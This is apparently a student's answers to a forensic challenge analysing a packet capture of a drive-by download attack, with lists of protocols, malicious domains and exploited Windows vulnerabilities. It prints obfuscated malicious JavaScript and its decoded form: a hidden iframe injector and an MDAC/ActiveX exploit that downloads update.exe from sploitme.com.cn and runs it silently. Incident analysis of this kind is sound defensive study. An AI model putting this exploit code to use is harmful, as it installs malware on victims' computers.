081710_Bilog_report_pcap2
- List the protocols found in the capture. What protocol do you think the attack is/are based on? (2pts)
The attack was based on HTTP protocol because it was used for malware distribution and the http stream sends or contained browser exploits which shows an attack.
The protocols found in the capture are the ff.:
a) HTTP
b) Netbios-ns
c) Netbios-dgm
d) ICMP
e) domain
- List IPs, hosts names / domain names. What can you tell about it? What to deduce from the setup? Does it look like real situations? (4pts)
· rapidshare.com.eyu32.ru
· sploitme.com.cn
· shop.honeynet.sg
· google
· google.fr
· honeynet.org
· clients1.google.fr
It seems that the workgroup is the same. The setup could be in a Virtual Machine with Windows and Linux included. And the attack doesn’t look like real situation, it might have been just a sham because of the virtual machine.
- List all the web pages. List those visited containing suspect and possibly malicious javascript and who's is connecting to it? Briefly describe the nature of the malicious web pages (6pts)
The “?click=” could have been from a suspicious javascript while the others look safe.
- Can you sketch an overview of the general actions performed by the attacker? (2pts)
- What steps are taken to slow the analysis down? (2pts)
a) The pages had Javascript code that is obscuring the encryption.
b) The malicious page are shamed to 404 page.
c) The first connection to sploitme.com.cn triggered the exploited service
d) The content of the page had to be taken an extra step in identifying the IP to make it accessible and to clean the 404 page to the client.
- Provide the javascripts from the pages identified in the previous question. Decode/de-obfuscate them too. (8pts)
var s="=jgsbnf!tsd>#iuuq;00tqmpjunf/dpn/do0@dmjdl>95d1:1ce97#!xjeui>2!ifjhiu>2!tuzmf>#wjtjcjmjuz;!
ijeefo#?=0jgsbnf?";
m="";
for(i=0;i<s.length;i++)
{
if(s.charCodeAt(i)==28)
{
m+="&";
}
else if(s.charCodeAt(i)==23)
{
m+= "!";
}
else
{
m+=String.fromCharCode(s.charCodeAt(i)-1);
}
}
document.write(m);
DECODED:
m = “<iframe src="http://sploitme.com.cn/?click=84c090bd86" width=1 height=1 style="visibility: hidden"></iframe>”
<script language='JavaScript'>
<!--
var CRYPT={
signature:'CGerjg56R',
_keyStr:'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',
decode:function(input){
var output='';
var chr1,chr2,chr3;
var enc1,enc2,enc3,enc4;
var i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,'');
while(i<input.length){
enc1=this._keyStr.indexOf(input.charAt(i++));
enc2=this._keyStr.indexOf(input.charAt(i++));
enc3=this._keyStr.indexOf(input.charAt(i++));
enc4=this._keyStr.indexOf(input.charAt(i++));
chr1=(enc1<<2)|(enc2>>4);
chr2=((enc2&15)<<4)|(enc3>>2);
chr3=((enc3&3)<<6)|enc4;
output=output+String.fromCharCode(chr1);
if(enc3!=64){output=output+String.fromCharCode(chr2);}
if(enc4!=64){output=output+String.fromCharCode(chr3);}
}
output=CRYPT._utf8_decode(output);
return output;
},
_utf8_decode:function(utftext){
var string='';
var i=0;
var c=0,c1=0,c2=0,c3=0;
while(i<utftext.length){
c=utftext.charCodeAt(i);
if(c<128){
string+=String.fromCharCode(c);
i++;
}else if((c>191)&&(c<224)){
c2=utftext.charCodeAt(i+1);
string+=String.fromCharCode(((c&31)<<6)|(c2&63));
i+=2;
}else{
c2=utftext.charCodeAt(i+1);
c3=utftext.charCodeAt(i+2);
string+=String.fromCharCode(((c&15)<<12)|((c2&63)<<6)|(c3&63));
i+=3;
}
}
return string;
},
obfuscate:function(str){
var container='';
for(var i=0,z=0;i<str.length;i=i+3,z++){
container+=String.fromCharCode(str.substring(i,i+3)-this.signature.substring(z
%this.signature.length,z%this.signature.length+1).charCodeAt(0));
}
return CRYPT.decode(container);
}
}
eval(CRYPT.obfuscate('1571811872311951541351661801171232041951561601691531531871792011851912141281421981
89161189196191200140103190165122187162181170153169180117149205214177211171152187120182200223192212126122
13017014421018421120110414013014618017522919519010616815618819022219117416817212916618312816822319615215
11631601151681881712231761221321931571581792281891891181651571551871512031941761561531911531911812011591
52151125201122171173188159204104128190166155150231196191152157163154149149211194193161141151124176198223
19220915312118517215518919215820114017320314317920519219017215713916813713620618919021911014313213711919
01642092141431371901221711731881592041041281901661551502311961911521571631541491492111941931611411511241
76198223192209153121185172155188222212202162111204165121191162182211157132166136175186200176168158129166
18312819016417615114210418517816118422216120312512813516812217522220518710217117215517020420117515213013
71541491192001841802111521421681751701521952171781371701391561211711621951531561651721501791562161941521
10121191175180176186180211152138130124169211200221201120162203157159183163205212105159159134144156213215
18917313019112419019120115821412616118213715716818722117615811119115719215823620317411010515817713721221
31741601631441701491731902012182071541221301871452111871631761581701601561591832251822131271581801761532
19212189206165130153157175199186184211128138198188161189183223202103140199157138205231206190173169157151
18721320421120717414417013618820022319222515212513918417015120019119314115813014715514921918318612616618
31181452092141781891741521871331192002241922111321051311751691731922142041041281901671431872352042081191
63171154191223204190219110156163179139199164155222151125168115161184217218182172115143'));
//-->
</script>
DECODED:
function Complete() {
setTimeout('location.href = "about:blank',2000);
}
function CheckIP() {
var req=null;
try{
req=new ActiveXObject("Msxml2.XMLHTTP");
}
catch(e){
try{
req=new ActiveXObject("Microsoft.XMLHTTP");
}
catch(e){
try{
req=new XMLHttpRequest();
}
catch(e){}
}
}
if(req==null)return"0";
req.open("GET","/fg/show.php?get_ajax=1&r="+Math.random(),false);
req.send(null);
if(req.responseText=="1"){
return true;
}
else{return false;}}
var urltofile='http://sploitme.com.cn/fg/load.php?e=1';
var filename='update.exe';
function CreateO(o,n){
var r=null;
try{
r=o.CreateObject(n)
}
catch(e){}
if(!r){
try{
r=o.CreateObject(n,'')
}
catch(e){}
}
if(!r){
try{
r=o.CreateObject(n,'','')
}
catch(e){}
}
if(!r){
try{
r=o.GetObject('',n)
}
catch(e){}
}
if(!r){
try{
r=o.GetObject(n,'')
}
catch(e){}
}
if(!r){
try{
r=o.GetObject(n)
}
catch(e){}
}
return r;
}
function Go(a){
var s=CreateO(a,'WScript.Shell');
var o=CreateO(a,'ADODB.Stream');
var e=s.Environment('Process');
var xhr=null;
var bin=e.Item('TEMP')+'\\'+filename;
try{
xhr=new XMLHttpRequest();
}
catch(e){
try{
xhr=new ActiveXObject('Microsoft.XMLHTTP');
}
catch(e){
xhr=new ActiveXObject('MSXML2.ServerXMLHTTP');
}
}
if(!xhr)return(0);
xhr.open('GET',urltofile,false)
xhr.send(null);
var filecontent=xhr.responseBody;
o.Type=1; //Binary data
o.Mode=3; // mode rw
o.Open();
o.Write(filecontent);
o.SaveToFile(bin,2); // saves to file, overwrites if exists.
s.Run(bin,0); // execute downloaded binary.
}
function mdac(){
var i=0;
var objects=new Array('{BD96C556-65A3-11D0-983A-00C04FC29E36}','{BD96C556-65A3-11D0-983A-
00C04FC29E36}','{AB9BCEDD-EC7E-47E1-9322-D4A210617116}','{0006F033-0000-0000-C000-
000000000046}','{0006F03A-0000-0000-C000-000000000046}','{6e32070a-766d-4ee6-879cdc1fa91d2fc3}','{
6414512B-B978-451D-A0D8-FCFDF33E833C}','{7F5B7F63-F06F-4331-8A26-
339E03C0AE3D}','{06723E09-F4C2-43c8-8358-09FCD1DB0766}','{639F725F-1B2D-4831-A9FD-
874847682010}','{BA018599-1DB3-44f9-83B4-461454C84BF8}','{D0C07D56-7C69-43F1-B4A0-
25F5A11FAB19}','{E8CCCDDF-CA28-496b-B050-6C07C962476B}',null);
while(objects[i]){
var a=null;
if(objects[i].substring(0,1)=='{'){
a=document.createElement('object');
a.setAttribute('classid','clsid:'+objects[i].substring(1,objects[i].length-1));
}
else {
try{
a=new ActiveXObject(objects[i]);
}
catch(e){}
}
if(a){
try{
var b=CreateO(a,'WScript.Shell');
if(b){
if(Go(a)){
if(CheckIP()){
Complete();
}
else {
Complete();
}
return true;
}
}
}
catch(e){}
}
i++;
}
Complete();
}
mdac();
(http://jsunpack.jeek.org/dec/go?report=5c500b07f9acce721ceafa5863416c0042b2ac32)
- On the malicious URLs, what do you think the variable 's' refers to? List the differences. (2pts)
· S=3feb5a6b2f
· S=84c090bd86
The ‘s’ refers to the traffic source ID. They have different exploits, they exploit set to their victims of browsing websites whether it’s acquired or compromised.
- Which operating system was targeted by the attacks? Which software? And which vulnerabilities? Could the attacks been prevented? (4pts)
Windows XP SP2 was the operating system victim with the Internet Explorer and MS Office as the software.
The following vulnerabilities have been found:
· Mdac : WScript.Shell - MS06-014
· Aolwinamp: IWinAmpActiveX.ConvertFile
· Directshow: 'msvidctl.dll' - MS09-032 - MS09-037
· Snapshot: MSOfficeSnapshotViewer - MS08-041
· Com: 'msdds.dll' COM Object - MS05-052
· Spreadsheet: OWC10.Spreadsheet - MS09-43
Yes. The attacks would have been prevented if the software involved will all be updated.
- Was there malware involved? What is the purpose of the malware(s)? (We are not looking for a detailed malware analysis for this (5pts)
Yes, the purpose of the malware created was to start Internet Explorer on the site, honeynet.org., where it will make the client download a file from the malware distribution and be able to execute it.
Bonus points:
- What actions does the shellcodes perform? Please list the shellcodes (+md5 of the binaries). What's the difference between them? (8pts)
Shellcode:
· MD5 1dacf1fbf175fe5361b8601e40deb7f0
· MD5 41d013ae668ceee5ee4402bcea7933ce
· MD5 22bed6879e586f9858deb74f61b54de4
· MD5 9167201943cc4524d5fc59d57af6bca6
